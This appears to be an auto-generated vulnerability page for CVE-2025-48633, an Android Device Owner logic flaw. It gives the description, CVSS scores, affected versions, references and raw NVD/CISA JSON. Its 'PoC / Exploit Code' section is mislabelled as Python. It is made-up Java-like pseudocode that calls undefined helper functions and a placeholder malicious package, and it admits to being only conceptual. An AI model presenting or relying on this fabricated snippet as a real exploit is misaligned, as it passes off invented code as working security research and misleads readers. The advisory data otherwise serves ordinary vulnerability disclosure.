CVE-2025-48633

Description

In hasAccountsOnAnyUser of DevicePolicyManagerService.java, there is a possible way to add a Device Owner after provisioning due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE

Android < 2025-12-01 Security Patch

Android frameworks/base (commit: d00bcda9f42dcf272d329e9bf9298f32af732f93)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-48633 PoC - Android Device Owner Bypass
// This PoC demonstrates the logic error in hasAccountsOnAnyUser method

// Note: This is a conceptual PoC based on the vulnerability description
// Actual exploitation requires specific Android device conditions

// 1. Check if device is already provisioned
boolean isProvisioned = checkDeviceProvisioning();

// 2. Attempt to add Device Owner after provisioning
// The logic error allows this operation to succeed when it should fail
try {
    // Normal flow should block this after provisioning
    // But the bug in hasAccountsOnAnyUser() returns incorrect result
    String adminPackage = "com.malicious.app";
    
    // This should fail but succeeds due to logic error
    boolean result = setDeviceOwner(adminPackage, "device_owner" /* component */);
    
    if (result) {
        // Successfully added Device Owner - privilege escalation achieved
        // Attacker now has full device control
        grantAdminPrivileges(adminPackage);
    }
} catch (SecurityException e) {
    // Expected to be thrown but bypassed due to bug
    Log.e("CVE-2025-48633", "Vulnerability blocked: " + e.getMessage());
}

// The root cause is in hasAccountsOnAnyUser():
// - Method incorrectly checks account existence
// - Returns false when it should return true
// - Allows Device Owner addition after provisioning

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-48633
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-48633
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-48633/
[4] VulDB https://vuldb.com/cve/CVE-2025-48633
[5] https://android.googlesource.com/platform/frameworks/base/+/d00bcda9f42dcf272d329e9bf9298f32af732f93
[6] https://source.android.com/security/bulletin/2025-12-01
[7] https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-48633

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-48633", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:19.610", "lastModified": "2025-12-10T02:00:02.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In hasAccountsOnAnyUser of DevicePolicyManagerService.java, there is a possible way to add a Device Owner after provisioning due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "cisaExploitAdd": "2025-12-02", "cisaActionDue": "2025-12-23", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Android Framework Information Disclosure Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}]}], "references": [{"url": "https://android.googlesource.com/platform/frameworks/base/+/d00bcda9f42dcf272d329e9bf9298f32af732f93", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-48633", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}